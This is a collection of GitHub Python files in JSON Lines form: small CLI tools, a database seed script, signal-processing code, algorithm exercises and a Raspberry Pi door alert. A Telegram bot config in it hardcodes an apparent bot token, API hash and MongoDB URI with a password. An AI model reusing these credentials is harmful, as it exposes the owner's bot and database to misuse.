os.environ.get(\"LD_LIBRARY_PATH\", \"\").split(':'))]:\n lib = _get_files(path, lambda p: os.path.basename(p) == \"libGTILibrary.so\")\n if lib:\n libgtisdk = os.path.abspath(lib[0])\n break\n except Exception as e:\n print(f\"[WARNING] Some errors occur when loading files from : {path}\")\n print(f\"[WARNING] {e}\")\n finally:\n _assert_with_msg_or_exit(bool(libgtisdk), f\"[ERROR] `libGTILibrary.so` does not found!\")\n\n # Set new configurations\n _C.LIBGTISDK = libgtisdk\n _C.TYPE = args.type\n _C.INPUT_PATH = args.input\n _C.OUTPUT_PATH = args.output\n _C.FANCY = args.fancy\n\n # Override Config with args\n _C.MODEL.PATH = args.model\n _C.MODEL.INPUT.SIZE = args.input_size\n _C.MODEL.INPUT.FORMAT = args.input_format\n _C.OPTS.CONF_THRESH = args.conf_thresh\n _C.OPTS.PROB_THRESH = args.prob_thresh\n _C.OPTS.NMS_THRESH = args.nms_thresh\n _C.OPTS.COLOR = [[0, 0, 0], [0, 225, 225], 
[225, 0, 0], [0, 225, 0], [0, 0, 225],\n [225, 0, 225], [225, 225, 225], [64, 0, 0], [192, 0, 0],\n [64, 128, 0], [192, 128, 0], [64, 0, 128], [192, 0, 128], [64, 128, 128],\n [192, 128, 128], [0, 64, 0], [128, 64, 0], [0, 192, 0], [128, 192, 0], [0, 64, 128]]\n return _C\n","repo_name":"cvamateur/pyGNetDet","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":12468,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"71040751827","text":"import csv\n\nclient_fields = ['mobile', 'name', 'age', 'emailid', 'loc']\nclient_database = 'travel.csv'\n\n\ndef displaymenu():\n print(\"Welcome to Travel Management System\\n\")\n print(\"1. Add Client\\n\")\n print(\"2. View Client\\n\")\n print(\"3. Update Client\\n\")\n print(\"4. Delete Client\\n\")\n print(\"5. Exit\\n\")\n\n\ndef add_student():\n print(\"Add Client Menu\")\n global client_fields\n global client_database\n\n client_data = []\n for field in client_fields:\n value = input(\"Enter \" + field + \":\")\n client_data.append(value)\n\n with open(client_database, \"a\", encoding=\"utf-8\") as f:\n writer = csv.writer(f)\n writer.writerows([client_data])\n\n print(\"Data added successfully !\")\n input(\"Press enter to continue\")\n return\n\n\ndef view_student():\n print(\"View Client Menu\")\n global client_fields\n global client_database\n\n print(\"List of Clients :\")\n\n with open(client_database, \"r\", encoding=\"utf-8\") as f:\n reader = csv.reader(f)\n for i in client_fields:\n print(i, end='\\t |')\n print(\"\\n\")\n\n for row in reader:\n for item in row:\n print(item, end=\"\\t |\")\n print(\"\\n\")\n\n input(\"Press enter to continue\")\n\n\ndef update_student():\n print(\"Update Client Menu\")\n global client_fields\n global client_database\n\n mob = input(\"Enter client's mobile number to update:\")\n index_client = None\n update_data = []\n\n with open(client_database, \"r\", encoding=\"utf-8\") as f:\n reader = csv.reader(f)\n counter = 0\n for row in reader:\n if len(row) > 0:\n if mob == row[0]:\n client_student = counter\n print(f\"Client's Number Found at Index value {client_student}\")\n client_data = []\n for field in client_fields:\n value = input(\"Enter \" + field + \":\")\n client_data.append(value)\n update_data.append(client_data)\n else:\n update_data.append(row)\n counter += 1\n\n if index_client is not None:\n with open(client_database, \"w\", encoding=\"utf-8\") as f:\n writer = csv.writer(f)\n writer.writerows([update_data])\n\n else:\n print(\"No client entries found for that Number\")\n\n input(\"Enter any key to continue\")\n\n\ndef delete_student():\n print(\"Delete Client Menu\")\n global client_fields\n global client_database\n\n roll_number = input(\"Please enter client number:\")\n client_found = False\n update_data = []\n with open(client_database, \"r\", encoding=\"utf-8\") as f:\n reader = csv.reader(f)\n counter = 0\n for row in reader:\n if len(row) > 0:\n if roll_number != row[0]:\n update_data.append(row)\n counter += 1\n else:\n client_found = True\n\n if client_found is True:\n with open(client_database, \"w\", encoding=\"utf-8\") as f:\n writer = csv.writer(f)\n writer.writerows(update_data)\n print(f\"Client was deleted successfully!\")\n\n else:\n print(\"Client Number not found in database\")\n\n input(\"Press enter to continue\")\n\n\nwhile True:\n displaymenu()\n choice = int(input(\"Enter your choice:\"))\n if choice == 1:\n add_student()\n elif choice == 2:\n view_student()\n elif choice == 
3:\n        update_student()\n    elif choice == 4:\n        delete_student()\n    elif choice == 5:\n        print(\"Thanks for using Travel Management System\")\n        exit()\n    else:\n        print(\"Wrong Choice!\")\n","repo_name":"cmulay/python-aio","sub_path":"CLI/Travel Management System/travel.py","file_name":"travel.py","file_ext":"py","file_size_in_byte":3700,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"48"} +{"seq_id":"71704288147","text":"\"\"\"Script to seed database.\"\"\"\n\nimport os\nimport json\nfrom datetime import datetime\n\nimport model\nimport server\n\nos.system(\"dropdb melonrez\")\nos.system(\"createdb melonrez\")\n\nmodel.connect_to_db(server.app)\nmodel.db.create_all()\n\n\ndef load_users():\n    \"\"\" Load users into the database. \"\"\"\n\n    kailey = model.User.create_user(user_id=1, email='kk@gmail.com')\n    omkar = model.User.create_user(user_id=2, email='om@gmail.com')\n\n    model.db.session.add_all([kailey, omkar])\n    model.db.session.commit()\n\ndef load_reservations():\n    \"\"\" Load reservations into the database. \"\"\"\n    \n    cantaloupe = model.Reservation.create_rez(user_id=1, start_date=datetime.strptime(\"2022-08-01\", \"%Y-%m-%d\"), rez_name=\"cantaloupes\")\n\n    model.db.session.add_all([cantaloupe])\n    model.db.session.commit()\n\nload_users()\nload_reservations()\n\n","repo_name":"kotynskm/melonrez","sub_path":"seed.py","file_name":"seed.py","file_ext":"py","file_size_in_byte":809,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"29277982761","text":"# -*- coding: utf-8 -*-\n\nimport time\nfrom Functions.measures import True_Map,Estimated_Map\nfrom scene_data import dim_img,dim_scene,N,nx,nz,px,pz,dx,dz,R_mp\nfrom Functions.helpers import (csgn,vec,unvec,row_thres,svd_thres,blockshaped,unblockshaped,hub,\n                               prox_huber,prox_huber_norm,make_img)\nimport jax.numpy as jnp\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfrom matplotlib.patches import Rectangle\ntargets = [(px[i],pz[i]) for i in range(len(px))]\nratio_dims = dim_scene/dim_img\n\ndef fobj_r(r,Psi_A,L,Y,c,block_size):\n    ''' objective fct for r-step '''\n    Psi_I_kron_r = unvec(Psi_A @ r, Y.shape) \n    Es = blockshaped(Y-L-Psi_I_kron_r,*(block_size))\n    Es = Es.reshape(Es.shape[0],-1)\n    Es_n = jnp.sqrt(jnp.apply_along_axis(jnp.sum,1,jnp.abs(Es)**2))\n    Es_hub = hub(Es_n,c)\n    sum_es = jnp.sum(Es_hub)\n    return sum_es\n\n\ndef hkrpca_fd(Y,Psi,lbd,mu,nu,eta,c,block_size:tuple,eps=1e-3,nits=None,print_conv=False):\n    \"\"\"\n    Huber RPCA (with Kronecker structured sparsity) via decoupling & ADMM.\n\n    Parameters\n    ----------\n    Y : array\n        data matrix.\n    Psi : array\n        dictionary.\n    lbd : scalar\n        sparsity parameter.\n    mu : scalar\n        rank parameter.\n    nu : scalar\n        first equality constraint.\n    eta : scalar\n        second equality constraint.\n    c : scalar\n        Huber fct threshold.\n    block_size : tuple\n        size of a block considered by the Huber fct.\n    nits : integer, optional\n        number of iteration for the algo.\n    r_nits : integer, optional\n        number of iteration for r-step GD.\n\n    Returns\n    -------\n    L : array\n        low rank matrix recovered.\n    r : array\n        sparse vector recovered.\n    \"\"\"\n    \n    ##Initialize variables\n    #Primal variables\n    L = jnp.zeros(Y.shape,dtype=Y.dtype)\n    R = jnp.zeros((nx*nz,R_mp),dtype=Y.dtype)\n    r = vec(R)\n    #Secondary variable\n    K = jnp.zeros(Y.shape,dtype=Y.dtype) #instead of M in the pdf\n    S = jnp.zeros(R.shape,dtype=R.dtype)\n    #Dual variable\n    U = jnp.zeros(Y.shape,dtype=Y.dtype)\n    V = jnp.zeros(R.shape,dtype=R.dtype)\n\n    \n    Psi_A = 
jnp.vstack(jnp.hsplit(Psi,N)) \n \n Psi_I_kron_r = unvec(Psi_A @ r, Y.shape)\n\n if not nits==None:\n it = 0\n \n res_hist = []\n time_hist = []\n\n \n cond=False\n \n t0 = time.time()\n\n while cond==False:\n\n #L-step\n \n if block_size == (1,1):\n Arg = K + U/nu - Y + Psi_I_kron_r\n L = csgn(Arg)*prox_huber(jnp.abs(Arg),c,mu/(2*nu)) + Y - Psi_I_kron_r\n else:\n Mat1 = blockshaped(K + U/nu ,*(block_size))\n Mat2 = blockshaped(-Y + Psi_I_kron_r ,*(block_size))\n \n L= []\n for i in range(Mat1.shape[0]):\n L.append(prox_huber_norm(Mat1[i,:,:] + Mat2[i,:,:],c,mu/(2*nu)) - Mat2[i,:,:])\n L = jnp.array(L)\n L = unblockshaped(L,*Y.shape)\n\n \n \n #R-step (MM)\n for itMM in range(1):\n Psi_I_kron_r = unvec(Psi_A @ r, Y.shape)\n \n E = Y-L-Psi_I_kron_r\n E = blockshaped(E,*(block_size))\n E = E.reshape(E.shape[0],np.prod(block_size))\n \n nE = jnp.apply_along_axis(jnp.linalg.norm,1, E)\n sqrtE = jnp.sqrt(c/nE)\n \n W = jnp.where(nE 10*dual_resL:\n nu = 2*nu\n elif dual_resL > 10*prim_resL:\n nu = nu/2\n \n prim_resR = jnp.linalg.norm(S-R)\n dual_resR = eta*jnp.linalg.norm(Sprev - S)\n \n if prim_resR > 10*dual_resR:\n eta = 2*eta\n elif dual_resR > 10*prim_resR:\n eta = eta/2\n \n Psi_I_kron_r = unvec(Psi_A @ r, Y.shape)\n\n #Convergence check\n res = (fobj_r(r,Psi_A,L,Y,c,block_size) + jnp.linalg.norm(S-R) +\n jnp.linalg.norm(K-L))/jnp.linalg.norm(Y)\n \n print(res, \" || \" , eps)\n \n \n if not nits==None:\n cond = it >= nits\n it += 1\n else:\n cond = res <= eps\n \n res_hist.append(res)\n time_hist.append(time.time())\n\n if print_conv:\n res_hist = np.array(res_hist) - res_hist[-1] \n time_hist = np.array(time_hist) - t0\n return L,K,R,S,res_hist,time_hist \n\n\n plt.plot(res_hist)\n plt.show()\n \n return L,K,R,S\n\n \ndef plot_hkrpca_fd(r,c,lbd,mu,nu,eta,plt_rect=False):\n #Plot \n fig, ax = plt.subplots()\n im = ax.imshow(np.abs(r),aspect='auto',\n extent = [0,dim_scene[0],0,dim_scene[1]])\n \n if plt_rect == True :\n for i in range(len(targets)):\n rect = Rectangle(targets[i] - 2/2 * np.array([dx,dz]), 2*dx, 2*dz,\n linewidth=1, edgecolor='r', facecolor='none')\n ax.add_patch(rect)\n \n ax.set_xticks(np.arange(0,dim_scene[0],0.5))\n ax.set_yticks(np.arange(0,dim_scene[1],0.5))\n ax.set_title(r\"$c$={}, $\\lambda$={}, $\\mu$={}, $\\nu$={},$\\eta$={}\".format(c,lbd,mu,nu,eta))\n fig.colorbar(im)\n plt.show()\n \n","repo_name":"hugobrh/hkrpca","sub_path":"Functions/hkrpca_fd.py","file_name":"hkrpca_fd.py","file_ext":"py","file_size_in_byte":6086,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"27607457711","text":"import mysql.connector\n\nmydb = mysql.connector.connect(\n host=\"localhost\",\n user=\"root\",\n passwd=\"root\",\n port=3306,\n database=\"altOnline\"\n)\n\nmycursor = mydb.cursor()\n\ndef isLeafDepartment(departmentName):\n mycursor.execute(\"SELECT * FROM departments WHERE parentDepartment=%s\", (departmentName,))\n myresult = mycursor.fetchall()\n if (len(myresult) == 0):\n return 1\n return 0\n\ndef getDepartmentProducts(departmentName):\n mycursor.execute(\"SELECT product_title, price_without_tax, discount, tax_to_add FROM products WHERE department=%s\", (departmentName,))\n myresult = mycursor.fetchall()\n return myresult\n\ndef getChildDepartments(departmentName):\n mycursor.execute(\"SELECT department_title FROM departments WHERE parentDepartment=%s\", (departmentName,))\n myresult = mycursor.fetchall()\n return myresult\n\ndef getProductDiscount(productTitle):\n mycursor.execute(\"SELECT discount FROM 
products WHERE product_title=%s\", (productTitle,))\n myresult = mycursor.fetchall()\n for x in myresult:\n return x\n\ndef setDiscount(productTitle, discount):\n mycursor.execute(\"UPDATE products SET discount = %s WHERE product_title=%s\", (discount, productTitle,))\n mydb.commit()\n\nprint(isLeafDepartment('IPads'))\n\nwhile (1):\n toDo = input(\"Do you want to list all products from a department or set discount for a specific product? (type 'dep' or 'disc' or 'quit') : \")\n if (toDo == 'dep'):\n department = input(\"Enter a department: \")\n if (isLeafDepartment(department)):\n products = getDepartmentProducts(department)\n print(\"The \" + department + \" have the following products:\")\n for product in products:\n price = int(round((float(product[1]) * (1 - 0.01 * float(product[2])) * (1 + 0.01 * float(product[3])))))\n print(product[0] + \", price: \" + \"$\" + str(price))\n else:\n childDepartments = getChildDepartments(department)\n print('Departments: ')\n for child in childDepartments:\n print(child[0])\n elif (toDo == 'disc'):\n productTitle = input(\"Enter a product title to get it's discount: \")\n discount = getProductDiscount(productTitle)[0]\n print(\"The discount for \" + productTitle + \" is \" + str(discount)+ \"%\")\n ans = input(\"Do you want to update the discount? (y for yes or n for no): \")\n\n if (ans == 'y'):\n newDiscount = input(\"Enter new discount: \")\n setDiscount(productTitle, newDiscount)\n newDiscount = getProductDiscount(productTitle)[0]\n print(\"New discount for \" + productTitle + \" is \" + str(newDiscount) + \"%\")\n elif (toDo == 'quit'):\n print('Bye!')\n break\n else:\n print(\"Error, you should write 'dep' or 'disc'\")\n","repo_name":"emanuelbodin/altOnline","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2812,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"41086851343","text":"'''\n© Mrvishal2k2\nRenameBot\nThis file is a part of mrvishal2k2 rename repo \nDont kang !!!\n© Mrvishal2k2\n'''\nimport os \n\nclass Config(object):\n APP_ID = int(os.environ.get(\"APP_ID\", \"2980496\"))\n API_HASH = os.environ.get(\"API_HASH\", \"9415a61fedcc0f00f33667ca46e577a3\")\n TG_BOT_TOKEN = os.environ.get(\"TG_BOT_TOKEN\", \"1705260996:AAHfaDQeXP2ft11YF3OR4CMJccTeRxIK5VE\")\n AUTH_USERS = set(int(x) for x in os.environ.get(\"AUTH_USERS\", \"\").split())\n DOWNLOAD_LOCATION = \"./bot/DOWNLOADS\"\n DB_URI = os.environ.get(\"DATABASE_URL\", \"mongodb+srv://Prorenamer:Prorenamer@prorenamer.2sj6d.mongodb.net/myFirstDatabase?retryWrites=true&w=majority\")\n # owner is for log cmd only owner can use (this can be multiple users)\n OWNER_ID = [int(i) for i in os.environ.get(\"OWNER_ID\", \"1086432320\").split(\" \")]\n OWNER_USERNAME = os.environ.get(\"OWNER_USERNAME\", \"Deeks_04_8\")\n CUSTOM_CAPTION = os.environ.get(\"CUSTOM_CAPTION\",False)\n\n UPDATE_CHANNEL = os.environ.get(\"UPDATE_CHANNEL\", \"DB_ROBOTS\")\n \n\n \n","repo_name":"DB-ROBOTS/DB-RENAMER_PROV2","sub_path":"root/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1037,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"3748594250","text":"import collections\nfrom typing import Dict, List\n\n\nclass Solution:\n def courseScheduleBfs(self, numCourses: int, prerequisites: List[int]) -> bool:\n pass\n\n def courseScheduleDfs(self, numCourses, prerequisites):\n preMap = { i: [] for i in range(numCourses) }\n for target, needed in 
prerequisites:\n            preMap[target].append(needed)\n\n        visit = set()\n\n        def dfs(node):\n            if node in visit:\n                return False \n\n            if preMap[node] == []:\n                return True \n\n            visit.add(node)\n\n            for prereq in preMap[node]:\n                if not dfs(prereq): return False  # a cycle anywhere below this prereq makes the schedule impossible\n\n            visit.remove(node)\n            preMap[node] = []\n            return True\n\n        for node in range(numCourses):\n            if not dfs(node): return False \n        return True\n\n\n    def courseScheduleTopo(self, numCourses, prerequisites):\n        adj = [set() for i in range(numCourses)]\n        \n        indegree = {i:0 for i in range(numCourses)}\n        for u,v in prerequisites:\n            indegree[v] += 1\n            adj[u].add(v)\n        \n        q = collections.deque()\n        for i in range(len(indegree)):\n            if indegree[i] == 0:\n                q.append(i)\n        \n        while q:\n            size = len(q)\n            for i in range(size):\n                node = q.popleft()\n                \n                for neighbor in adj[node]:\n                    indegree[neighbor] -= 1\n                    if indegree[neighbor] == 0:\n                        q.append(neighbor)\n        \n        return max(indegree.values()) == 0\n\n\nif __name__ == '__main__':\n    numCourses = 5\n    prerequisites = [\n        [0, 1],\n        [0, 2],\n        [1, 3],\n        [1, 4],\n        [3, 4]\n    ]\n    s = Solution()\n    # print(s.courseScheduleBfs(numCourses, prerequisites))\n    print(s.courseScheduleTopo(numCourses, prerequisites))","repo_name":"jprice8/interview-prep","sub_path":"graphs/courseSchedule.py","file_name":"courseSchedule.py","file_ext":"py","file_size_in_byte":1909,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"11170858397","text":"#!/usr/bin/python3\n\"\"\"class Square that defines a square\"\"\"\n\n\nclass Square:\n    \"\"\"\n    class Square that defines a square\n    Attributes:\n        __size (int): size of the square private attribute\n    Methods:\n        __init__(self, size): initializes instance of the class\n    \"\"\"\n    def __init__(self, size=0):\n        \"\"\"\n        __init__(self, size): initializes instance of the class\n        Args:\n            size (int): size of the square\n        \"\"\"\n        if not isinstance(size, int):\n            raise TypeError(\"size must be an integer\")\n        elif size < 0:\n            raise ValueError(\"size must be >= 0\")\n        else:\n            self.__size = size\n","repo_name":"AhmedElSaeedTalat/alx-higher_level_programming","sub_path":"0x06-python-classes/2-square.py","file_name":"2-square.py","file_ext":"py","file_size_in_byte":703,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"14424615061","text":"\"\"\"\nTime: O(n)\nSpace: O(n)\n\nNotes:\n1. node = queue.pop(0)\n2. 
res.insert(0, level)\n\n\"\"\"\n\n\"\"\"\nDefinition of TreeNode:\nclass TreeNode:\n def __init__(self, val):\n self.val = val\n self.left, self.right = None, None\n\"\"\"\n\nclass Solution:\n \"\"\"\n @param root: A tree\n @return: buttom-up level order a list of lists of integer\n \"\"\"\n def levelOrderBottom(self, root):\n # write your code here\n if root is None:\n return []\n \n queue = [root]\n res = []\n \n while queue:\n level = []\n \n for _ in range(len(queue)):\n node = queue.pop(0)\n level.append(node.val)\n \n if node.left:\n queue.append(node.left)\n if node.right:\n queue.append(node.right)\n \n res.insert(0, level)\n \n return res\n","repo_name":"teslamyesla/leetcode","sub_path":"python/lintcode-0070-binary-tree-level-order-traversal-ii.py","file_name":"lintcode-0070-binary-tree-level-order-traversal-ii.py","file_ext":"py","file_size_in_byte":949,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"42062546700","text":"from gpiozero import Button\nfrom signal import pause\nimport requests\nimport json\nimport os\nfrom datetime import datetime, time\n\n# define the pin that the reed switch is connected to\nreed_switch = Button(17)\nifttt_key = os.environ['IFTTT_KEY']\n# define your IFTTT webhook URL\nifttt_url = 'https://maker.ifttt.com/trigger/door_alert/with/key/' + ifttt_key\n\ndef read_time_window():\n with open('time_window.json', 'r') as f:\n time_window = json.load(f)\n start_time = time(time_window['start_hour'], time_window['start_minute'])\n end_time = time(time_window['end_hour'], time_window['end_minute'])\n return start_time, end_time\n\ndef door_opened():\n start_time, end_time = read_time_window()\n\n # check the current time\n current_time = datetime.now().time()\n\n # check if the current time is within the defined window\n if start_time <= current_time <= end_time:\n print('Door opened during defined time window!')\n # send HTTP request to IFTTT\n response = requests.post(ifttt_url)\n\n # print response status (200 is success)\n print('Response status: ', response.status_code)\n else:\n print('Door opened outside of defined time window. No action taken.')\n\ndef door_closed():\n print('Door closed!')\n\n# define what happens when the switch opens and closes\nreed_switch.when_pressed = door_opened\nreed_switch.when_released = door_closed\n\n# keep the program running\npause()\n","repo_name":"0xmayday/raspberrypi-tools","sub_path":"door_alert/door_alert.py","file_name":"door_alert.py","file_ext":"py","file_size_in_byte":1437,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"5005752162","text":"\nimport random\n\n# The average energy released per fission for 239Pu94 is 180 MeV. How much energy per fission is released if all the atoms in m g of pure 239Pu94 undergo fission.\n\nqns = open('./questions.txt', 'w')\nans = open('./answers.txt','w')\n\nno_of_samples = 10000\n\nN = 6.023 * (10**23)\n\nfor i in range(no_of_samples):\n m = random.randint(1,20000)\n m = round(m/10,1)\n ques = \"The average energy released per fission for 239Pu94 is 180 MeV. 
How much energy per fission is released if all the atoms in \" + str(m) + \" g of pure 239Pu94 undergo fission.\\n\"\n    answ = (N*m*180*1.6*(10**-13))/239\n    answer = \"{:.2e}\".format(answ) + \"joule\\n\"\n    qns.write(ques)\n    ans.write(answer)\n\nqns.close()\nans.close()\n","repo_name":"misterpawan/scimat2","sub_path":"science/AtomsAndNuclei/Fission/Fission.py","file_name":"Fission.py","file_ext":"py","file_size_in_byte":720,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"48"} +{"seq_id":"12046001325","text":"# Challenge 2 (Creating a histogram)\nimport matplotlib.pyplot as plt\n\nplt.style.use('ggplot')\n\nnums = [0.5, 0.7, 1, 1.2, 1.3, 2.1]\nbins = [0, 1, 2, 3]\n\nplt.hist(nums, bins, color=\"black\")\nplt.xlabel(\"nums\")\nplt.ylabel(\"count\")\nplt.title(\"Histogram of nums against bins\")\nplt.show()\n","repo_name":"izzyevermore/machine-learning-challenge","sub_path":"training.py","file_name":"training.py","file_ext":"py","file_size_in_byte":280,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"5200691074","text":"import cv2\nimport dlib\nimport numpy as np \n\nimg = cv2.imread('C:\\\\Users\\\\smart\\\\Pictures\\\\opencv images\\\\lena.jfif')\nimg = cv2.resize(img, (0,0), None, 3,3)\nimgoriginal = img.copy()\n\ndetector = dlib.get_frontal_face_detector()\n\ngray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\nfaces = detector(gray)\n\nfor face in faces:\n\tx1,y1 = face.left(), face.top()\n\tx2,y2 = face.right(), face.bottom()\n\timgoriginal = cv2.rectangle(img, (x1,y1),(x2,y2), (255,0,0), 2)\n\ncv2.imshow('img', imgoriginal)\ncv2.waitKey(0)","repo_name":"Mohammed-Rahman-sherif/OpenCV-Basics-2","sub_path":"landmark detector/outerface.py","file_name":"outerface.py","file_ext":"py","file_size_in_byte":497,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"12979342558","text":"# -*- coding: utf-8 -*-\r\n\r\n# Class ISMN-6650-001\r\n# Irida Medina #\r\n\r\n\r\n# Assignment 1 - Question 2 -------------------------------------\r\n# Printing title\r\nprint('----------Largest of the three numbers----------');\r\n\r\n# Ask the user for the three numbers and assign them as float\r\nv_number_1 = float(input('Enter the first number: '));\r\nv_number_2 = float(input('Enter the second number: '));\r\nv_number_3 = float(input('Enter the third number: '));\r\n\r\n# Use if-elif-else to find the largest number\r\nif (v_number_1>=v_number_2) and (v_number_1>=v_number_3):\r\n    v_max = v_number_1\r\nelif (v_number_2>=v_number_3):\r\n    v_max = v_number_2\r\nelse: v_max = v_number_3;\r\n\r\n#Print the result\r\nprint('The largest number is: %.1f' %v_max);\r\n\r\n","repo_name":"lunaim174/python_class","sub_path":"Irida Medina - A1 - Question 2.py","file_name":"Irida Medina - A1 - Question 2.py","file_ext":"py","file_size_in_byte":704,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"28224067660","text":"import requests\nimport json\nimport sys\nimport click\nimport tabulate\n\nimport urllib3\nurllib3.disable_warnings()\n\ndef get_devices(server: str, domain: str, token: str) -> list:\n    path: str = \"https://{}/securitymanager/api/domain/{}/device?page=0&pageSize=100\"\n    headers: dict = {'Content-Type': 'application/json', 'X-FM-Auth-Token': token}\n    response = None\n    try:\n        response = requests.get(url=path.format(server, domain), headers=headers, verify=False)\n    except requests.exceptions.HTTPError as errh:\n        print(\"Http Error:\", errh)\n    except 
requests.exceptions.ConnectionError as errc:\n        print(\"Error Connecting:\", errc)\n    except requests.exceptions.Timeout as errt:\n        print(\"Timeout Error:\", errt)\n    except requests.exceptions.RequestException as err:\n        print(\"Oops: Something Else\", err)\n    if response is not None and response.ok:\n        json_data: str = response.text\n        devices: dict = json.loads(json_data)[\"results\"]\n        table = list()\n\n        for device in devices:\n            tr = [device['name'], device['id']]\n            table.append(tr)\n\n        table_headers = [\"name\", \"id\"]\n        try:\n            click.echo(tabulate.tabulate(table, table_headers, tablefmt=\"fancy_grid\"))\n        except UnicodeEncodeError:\n            click.echo(tabulate.tabulate(table, table_headers, tablefmt=\"grid\"))\n\n    else:\n        sys.exit()\n    ","repo_name":"WichoChuletas/firemon-asa","sub_path":"firemon_api/device.py","file_name":"device.py","file_ext":"py","file_size_in_byte":1352,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73538067347","text":"# Function that fills a file with random pairs of numbers.\n# The first number is an int, the second a float, separated by a vertical bar.\n# Minimum number: -1000, maximum: +1000.\n# The number of rows and the file name are passed as arguments to the function.\n\nimport random\nfrom pathlib import Path\n\nMIN_NUM = -1000\nMAX_NUM = 1000\n\ndef fill_number(name: str | Path, rows: int):\n    with open(name, 'a', encoding='utf-8') as numbers:  # use the `name` argument instead of a hard-coded file name\n        for _ in range(rows):\n            num_int = random.randint(MIN_NUM, MAX_NUM)\n            num_float = random.uniform(MIN_NUM, MAX_NUM)\n            numbers.write(f'{num_int} | {num_float}\\n')\n\n\nif __name__ == '__main__':\n    fill_number(\"numbers.txt\", 50)","repo_name":"ValeryBurlakov/python_based","sub_path":"seminars/seminar_7/task_1.py","file_name":"task_1.py","file_ext":"py","file_size_in_byte":831,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"41220458201","text":"from tkinter import *\nimport tkinter as tk\nfrom PIL import ImageTk\nfrom Scrollbar import scrollbar\nimport datetime\nfrom datetime import timedelta\nfrom ServerSide.SelectOperation import SelectOperation\n\nclass YesterdayReportPage():\n    def __init__(self, parent):\n        self.parent = parent\n        self.ligBluePrimColor = \"#F2F8FF\"\n        self.font = \"Bahnschrift\"\n\n    def draw(self):\n        textColor = \"#0F4189\"\n        horizontalDivider = ImageTk.PhotoImage(file=(\"Assets/horizontalDivider.png\"))\n\n        rawData = SelectOperation().yesterdayAttendance()\n\n        canvas = tk.Canvas(self.parent, bg=self.ligBluePrimColor, bd=0, width=730, height=524,\n                           highlightthickness=0)\n\n        content_frame = Frame(canvas, bg=self.ligBluePrimColor, width=730, height=524)\n\n        scrol = scrollbar(canvas, canvas, height=235)\n        scrol.draw()\n\n        content_frame.bind('<Configure>', lambda e: canvas.configure(scrollregion=canvas.bbox(\"all\")))\n\n        canvas.create_window((0, 0), window=content_frame, anchor=\"nw\")\n        canvas.configure(yscrollcommand=scrol.get().set)\n\n        canvas.place(x=0, y=0)\n\n        self.date = Label(content_frame, text=f\"Date:-{datetime.date.today() - timedelta(days=1)}\",\n                          bg=self.ligBluePrimColor, bd=0, font=(self.font, 15, 'normal'), justify=\"center\")\n        self.date.grid(row=0, columnspan=5, padx=300, pady=10)\n\n        row = 0\n\n        if len(rawData) > 0:\n            for data in rawData:\n                Label(content_frame, text=data[0], fg=textColor, bg=self.ligBluePrimColor, bd=0,\n                      font=(self.font, 25, 'bold'),\n                      justify=\"center\").grid(row=row + 1, columnspan=5, padx=200, pady=20)\n\n                Label(content_frame, text=\"Present\", fg=textColor, bg=self.ligBluePrimColor, bd=0,\n                      
font=(self.font, 20, 'normal'),\n justify=\"center\").grid(row=row + 2, column=0, pady=12, padx=70)\n\n Label(content_frame, text=data[1], fg=textColor, bg=self.ligBluePrimColor, bd=0,\n font=(self.font, 20, 'normal'), justify=\"center\").grid(row=row + 3, column=0)\n\n Label(content_frame, text=\"Absent\", fg=textColor, bg=self.ligBluePrimColor, bd=0,\n font=(self.font, 20, 'normal'),\n justify=\"center\").grid(row=row + 2, column=1, padx=70)\n\n Label(content_frame, text=data[2], fg=textColor, bg=self.ligBluePrimColor, bd=0,\n font=(self.font, 20, 'normal'), justify=\"center\").grid(row=row + 3, column=1)\n\n Label(content_frame, text=\"Total\", fg=textColor, bg=self.ligBluePrimColor, bd=0,\n font=(self.font, 20, 'normal'), justify=\"center\").grid(row=row + 2, column=2, padx=70)\n\n Label(content_frame, text=data[3], fg=textColor, bg=self.ligBluePrimColor, bd=0,\n font=(self.font, 20, 'normal'), justify=\"center\").grid(row=row + 3, column=2)\n\n horizontalbar = Label(content_frame, bg=self.ligBluePrimColor, bd=0, image=horizontalDivider)\n horizontalbar.photo = horizontalDivider\n horizontalbar.grid(row=row + 4, columnspan=5, pady=40)\n\n row += 4\n else:\n empty = Label(content_frame, text=\"No Data to Show Here\", bg=self.ligBluePrimColor, bd=0,\n font=(self.font, 20, 'normal'))\n empty.grid(row=1, columnspan=5)","repo_name":"ManishJangid007/Attendence-Management-System","sub_path":"Admin/attendancePanelFrame/yesterdayReportPage.py","file_name":"yesterdayReportPage.py","file_ext":"py","file_size_in_byte":3483,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"21744209969","text":"#!/usr/bin/python3\n# Author: Hack.You\nfrom pwn import *\nimport 